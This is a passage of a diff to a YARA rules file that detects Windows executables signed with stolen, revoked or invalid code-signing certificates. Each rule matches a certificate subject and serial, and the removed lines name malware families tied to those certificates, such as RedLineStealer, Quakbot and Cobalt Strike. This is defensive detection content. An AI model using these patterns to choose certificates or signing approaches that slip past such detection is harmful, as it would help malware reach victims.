-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8011-L8024"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2599-L2610"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf9b2ab7a379437daa04565fdf7adc04db2f6f1a6284d1fd91f037b255523c42"
+		logic_hash = "1fdd8f6535bf5a78fcd7e33475a650914053f1391fe04f885e9e5a84452bfe5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "27b75dc1d31a581f6e02bba3c03a62174ee4456021c7de50922caa10b98f8f7a"
-		reason = "Malware"
+		thumbprint = "3306df7607bed04187d23c1eb93adf2998e51d01"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "36:28:b9:3b:cd:90:2b:6b:3e:1f:fd:f2:e1:3d:fc:f5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REITSUPER ESTATE LLC" and pe.signatures [ i ] . serial == "07:cf:63:bd:cc:c1:5c:55:e5:ce:78:5b:df:be:aa:cf" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0382Cd4B6Ed21Ed7C3Eaea266269D000 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f0baf7ea-7022-5834-a46c-b67bfbe706d0"
+		id = "ad4bc1bc-4d72-51bf-a22c-cd98f33f3931"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8026-L8039"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2612-L2623"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "438667b55f23b689627fc1e5bce0e53b960ef51d1a7d3203e398c59bd94ffe93"
+		logic_hash = "7e8204f2ec30da73bc2eb83e065412c96e084d7ff5f8ab6125d643693d7407d1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f7a578c93fd98ade3d259ac47f152d8c9115bc5df7e2f57d107a66db3f833f0f"
-		reason = "NetSupport RAT"
+		thumbprint = "e600612ffcd002718b7d03a49d142d07c5a04154"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pak El AB" and pe.signatures [ i ] . serial == "a3:2b:8b:4f:1b:e4:3c:23:eb:28:48:ab:4e:f0:6b:b2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LOOK AND FEEL SP Z O O" and pe.signatures [ i ] . serial == "03:82:cd:4b:6e:d2:1e:d7:c3:ea:ea:26:62:69:d0:00" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_17Ccecc181Ed65A357Edf3B01Df62Cc9 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_08653Ef2Ed9E6Ebb56Ffa7E93F963235 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b692d8dd-e7c9-53cb-8c65-0001c2af3f6f"
+		id = "8883185a-8239-5648-bebc-3a4c3578a7d6"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8041-L8054"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2625-L2636"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d79968633717744ab9e9006f8d958c1e240a1e0f99fd0b4c603d42bb7cd4773c"
+		logic_hash = "b0e35f2dbd27de0dc9ea6ee7958c477e6a154bc4c8bb5484ba85ed5732502645"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b64bd77a58c90f76afd6c4ce0b38c54c3c6088b818d0b83e5435d89e3dc01cda"
-		reason = "RedLineStealer"
+		thumbprint = "1567d022b47704a1fd7ab71ff60a121d0c1df33a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "17:cc:ec:c1:81:ed:65:a3:57:ed:f3:b0:1d:f6:2c:c9" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haw Farm LIMITED" and pe.signatures [ i ] . serial == "08:65:3e:f2:ed:9e:6e:bb:56:ff:a7:e9:3f:96:32:35" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_332Bd5801E8415585E72C87E0E2Ec71D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ddce8Cdc91B5B649Bb4B45Ffbba6C6C : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a4e1560f-12e4-5f49-a714-7df939dad513"
+		id = "180b2e63-7151-5899-8c12-7e4cd3bb2e0d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8056-L8069"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2638-L2649"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ad3b1aebedd1ecef9af96da991cdbaca8033e0d48b5e7b776dd3fd3c4024928e"
+		logic_hash = "940d257253a0a1a3f70dcec1cb57e9ab08108138ce3b80c9f74228a8b702601c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "47338c1a0ea425c47dede188d10ca95288514f369fe8a5105752bd8d906b8cbc"
-		reason = "NetSupport"
+		thumbprint = "23c446940a9cdc9f502b92d7928e3b3fde6d3735"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Marketing Strategies, Inc." and pe.signatures [ i ] . serial == "33:2b:d5:80:1e:84:15:58:5e:72:c8:7e:0e:2e:c7:1d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLIM DOG GROUP SP Z O O" and pe.signatures [ i ] . serial == "0d:dc:e8:cd:c9:1b:5b:64:9b:b4:b4:5f:fb:ba:6c:6c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0139Dde119Bb320Dfb9F5Defe3F71245 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4Af27Cd14F5C809Eec1F46E483F03898 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4962ea0c-ce99-57d3-8848-48dcaab4f346"
+		id = "e7bbc10b-54fc-5950-99fc-80a459406780"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8071-L8084"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2651-L2662"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b2a7154d73eb9271a181d71d65c73e399bb2f7d1fe031240e94b6ef4c4f7cb18"
+		logic_hash = "0297f156d1e4d1c20143953759000b286ac9e1f8864aa511e0e2f8fa5c3eac7f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645"
-		reason = "RedLineStealer"
+		thumbprint = "5fa9a98f003f2680718cbe3a7a3d57d7ba347ecb"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hangil IT Co., Ltd" and pe.signatures [ i ] . serial == "01:39:dd:e1:19:bb:32:0d:fb:9f:5d:ef:e3:f7:12:45" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DAhan Advertising planning" and pe.signatures [ i ] . serial == "4a:f2:7c:d1:4f:5c:80:9e:ec:1f:46:e4:83:f0:38:98" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_105765998695197De4109828A68A4Ee0 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a905ee22-94c6-5d16-a9a4-a1c1528e4ac2"
+		id = "97a4bad1-9b84-54e3-a1c2-6d01bd4cde4c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8086-L8099"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2664-L2675"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "94a5721bd3089f46699a947afcd03287712f94754666809e6495b01fc9cd6dcf"
+		logic_hash = "c251f28eec6f93522f5a3706e1abcfd892affa2b36ed84ec277dc0d4716ff667"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f13e4801e13898e839183e3305e1dda7f4c0ebf6eaf7553e18c1ddd4edc94470"
-		reason = "Gozi"
+		thumbprint = "5ddae14820d6f189e637f90b81c4fdb78b5419dc"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and pe.signatures [ i ] . serial == "2f:96:a8:9b:fe:c6:e4:4d:d2:24:e8:fd:7e:72:d9:bb" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cryptonic ApS" and pe.signatures [ i ] . serial == "10:57:65:99:86:95:19:7d:e4:10:98:28:a6:8a:4e:e0" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_626735Ed30E50E3E0553986D806Bfc54 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_53F575F7C33Ee007887F30680486Db5E : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5cab852e-8483-5c38-a396-3a53cf64450a"
+		id = "8353ac89-1d98-5b05-a851-50d9e42f8f74"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8101-L8114"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2677-L2688"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "960005fe1a28ddb50261aeaaa850a2410ac03ee9709af2a75485313676c92c53"
+		logic_hash = "050d8c4dcb80cd637981c208c6d1316e9933d4f06bbf8af3717d2205a4f84f6d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a1488004ec967faf6c66f55440bbde0de47065490f7c758f3ca1315bb0ef3b97"
-		reason = "Quakbot"
+		thumbprint = "a42d8f60663dd86265e566f33d0ed5554e4c9a50"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FISH ACCOUNTING & TRANSLATING LIMITED" and pe.signatures [ i ] . serial == "62:67:35:ed:30:e5:0e:3e:05:53:98:6d:80:6b:fc:54" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RET PTY. LTD." and pe.signatures [ i ] . serial == "53:f5:75:f7:c3:3e:e0:07:88:7f:30:68:04:86:db:5e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4A2E337Fff23E5B2A1321Ffde56D1759 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_7E89B9Df006Bd1Aa4C48D865039634Ca : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "60d218b2-5297-59e6-9370-fc0ba036c688"
+		id = "aa208da9-06e2-5bf5-8453-a545c640efa7"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8116-L8129"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2690-L2701"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "524048d39de89002efbb8bf75135551b300e03f1126e5e117a4682c79ec04c9a"
+		logic_hash = "825e4b69aec565b6ef6b4ac2394f5a562a84615e3c91331934fa378152635df4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "67099e0c41c102535d388fab1de576433f2ded2b08fb7da1bf66e3bdaba4eeb4"
-		reason = "IcedID"
+		thumbprint = "63ad44acaa7cd7f8249423673fbf3c3273e7b2dc"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karolina Klimowska" and pe.signatures [ i ] . serial == "4a:2e:33:7f:ff:23:e5:b2:a1:32:1f:fd:e5:6d:17:59" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dummy" and pe.signatures [ i ] . serial == "7e:89:b9:df:00:6b:d1:aa:4c:48:d8:65:03:96:34:ca" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_967Cb0898680D1C174B2Baae5Fa332Db : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ddeb53F957337Fbeaf98C4A615B149D : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a95f7912-89fc-5c80-96ab-19e6ee2ccafd"
+		id = "13347f66-c726-59be-9d0e-871512335bbd"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8131-L8144"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2703-L2714"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8c68127b29d1a1aa4c1e2033c809fa57466f224c2bb4ede0ffb2b572a3d58c0f"
+		logic_hash = "4932dcea41879fd29250456cfef7a32a1303f599adbd4b61d91cb2e7e22cf5a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c231f1e6cc3aec983d892e1bc3bb1815335fb24e3e2f611d79bade9a07cbd819"
-		reason = "Babadeda"
+		thumbprint = "91cabea509662626e34326687348caf2dd3b4bba"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "James Caulfield" and pe.signatures [ i ] . serial == "96:7c:b0:89:86:80:d1:c1:74:b2:ba:ae:5f:a3:32:db" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mozilla Corporation" and pe.signatures [ i ] . serial == "0d:de:b5:3f:95:73:37:fb:ea:f9:8c:4a:61:5b:14:9d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_890570B6B0E2868A53Be3F8F904A88Ee : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00C88Af896B6452241Fe00E3Aaec11B1F8 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8d619117-00cb-5276-87c1-3f6cd701218d"
+		id = "4d73705a-e980-5aa0-a326-e35990226e37"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8146-L8159"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2716-L2727"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "952b211cc2c7988b9a09ca5a96c44fea24bbaced28a79ab0ae6732675fda7365"
+		logic_hash = "3a5f290f9479189ff83bf5da3a3d086453c9230311a48f4c0bd4654024ebeef8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f291d21d72dcefc369526a97b7d39214544b22057757ac00907ab4ff3baa2edd"
-		reason = "Quakbot"
+		thumbprint = "9ce1cbf5be77265af2a22e28f8930c2ac5641e12"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JESEN LESS d.o.o." and pe.signatures [ i ] . serial == "89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TeamViewer Germany GmbH" and pe.signatures [ i ] . serial == "00:c8:8a:f8:96:b6:45:22:41:fe:00:e3:aa:ec:11:b1:f8" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_7D27332C3Cb3A382A4Fd232C5C66A2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_09E015E98E4Fabcc9Ac43E042C96090D : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BestEncrypt commercial disk encryption and wiping software signing certificate"
 		author = "ditekSHen"
-		id = "d9f0d30b-ac9d-57f9-8220-c6a376fe68db"
+		id = "577cff87-b676-598b-acea-e7c01df0ef15"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8161-L8174"
+		reference = "https://blog.macnica.net/blog/2020/11/dtrack.html"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2729-L2742"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d21218469ae41def8eed3d2cff38744ae928d9e8fed8ff68c539d33193136e0f"
+		logic_hash = "77f9f50c6dd862419edaa7c3fcee0ce3f607a5b7b939d7844969082ab9777bbf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "935af7361c09f45dcf3fa6e4f4fd176913c47673104272259b40de55566cabed"
-		reason = "Silence"
+		thumbprint = "04e407118516053ff248503b31d6eec6daf4a809"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MALVINA RECRUITMENT LIMITED" and pe.signatures [ i ] . serial == "7d:27:33:2c:3c:b3:a3:82:a4:fd:23:2c:5c:66:a2" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jetico Inc. Oy" and pe.signatures [ i ] . serial == "09:e0:15:e9:8e:4f:ab:cc:9a:c4:3e:04:2c:96:09:0d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_40F5660A90301E7A8A8C3B42 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_118D813D830F218C0F46D4Fc : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BestEncrypt commercial disk encryption and wiping software signing certificate"
 		author = "ditekSHen"
-		id = "c3c8fbdf-49ca-5898-b267-74256154973a"
+		id = "b14b14c8-202d-533d-97dc-c6336ddf75c4"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8176-L8189"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2744-L2755"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ed584aa8ad833066ed9f7ddbf98dc75efe88e0b7e69f564a90eade63dc2aee2d"
+		logic_hash = "3240504794394c06f050ef3eb5ef82e0b476e2bbeabfb394fc4646e98bc6e976"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2ac041e3c46c82fbcee34617ee31336e845e18efe6b9ae5c8811351db5b56da2"
-		reason = "Cobalt Strike"
+		thumbprint = "bd16f70bf6c2ef330c5a4f3a27856a0d030d77fa"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Booz Allen Hamilton Inc." and pe.signatures [ i ] . serial == "40:f5:66:0a:90:30:1e:7a:8a:8c:3b:42" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shang Hai Shen Wei Wang Luo Ke Ji You Xian Gong Si" and pe.signatures [ i ] . serial == "11:8d:81:3d:83:0f:21:8c:0f:46:d4:fc" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Dfc1F1B0F205Cc17Ed7D216Bb991F859 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2304Ecf0Ea2B2736Beddd26A903Ba952 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "93d5fd87-af92-5449-9d02-4666afa38fff"
+		id = "3e064799-2333-5d10-8841-8d0a44ad9c1b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8191-L8204"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2757-L2768"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "24783267ab27f8102f724810322a7fbb010b7a2abf59ad206b96a3eb75968907"
+		logic_hash = "c10695440ec4e39cf5b51c926ceeacc13caf3a58006c64b0168a04b4755978a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b577362c1abcfb7d163b8702f23a6a3643c72ea0a3c8cf262092903a3110fa04"
-		reason = "PrivateLoader"
+		thumbprint = "d59a63e230cef77951cb73a8d65576f00c049f44"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Astori LLC" and pe.signatures [ i ] . serial == "df:c1:f1:b0:f2:05:cc:17:ed:7d:21:6b:b9:91:f8:59" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x88\\x90\\xE9\\x83\\xBD\\xE5\\x90\\x89\\xE8\\x83\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE8\\xB4\\xA3\\xE4\\xBB\\xBB\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "23:04:ec:f0:ea:2b:27:36:be:dd:d2:6a:90:3b:a9:52" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_E573D9C8B403C41Bd59Ffa0A8Efd4168 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4D78E90E0950Fc630000000055657E1A : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "683ea9a6-2002-5c48-8512-51f65e70dd2c"
+		id = "bb48d309-e7b8-5c39-b989-cce4093b2082"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8206-L8219"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2770-L2781"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ec53ab007d8be2f3cad45e787e724c5af0dd3f18c2b66a179b822bdeeb0d1560"
+		logic_hash = "c2a3714173defa7b8e97ea92f8f85fb47011099bdc24067aafa273ebdd282f0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a9ab2be0ea677c6c6ed67b23cfee0fa44bfb346a4bb720f10a3f02a78b8f5c82"
-		reason = "Dridex"
+		thumbprint = "fd010fdee2314f5d87045d1d7bf0da01b984b0fe"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VERONIKA 2\" OOO\"" and pe.signatures [ i ] . serial == "e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Telus Health Solutions Inc." and pe.signatures [ i ] . serial == "4d:78:e9:0e:09:50:fc:63:00:00:00:00:55:65:7e:1a" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2F38De4Ced0B070973B9E9B9B1Dcfa7F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0092Bc051F1811Bb0B86727C36394F7849 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "39910712-4a11-5722-9b48-c069bfcefb14"
+		id = "9ffef880-ed00-54a7-8eb2-995c5c4e74f1"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
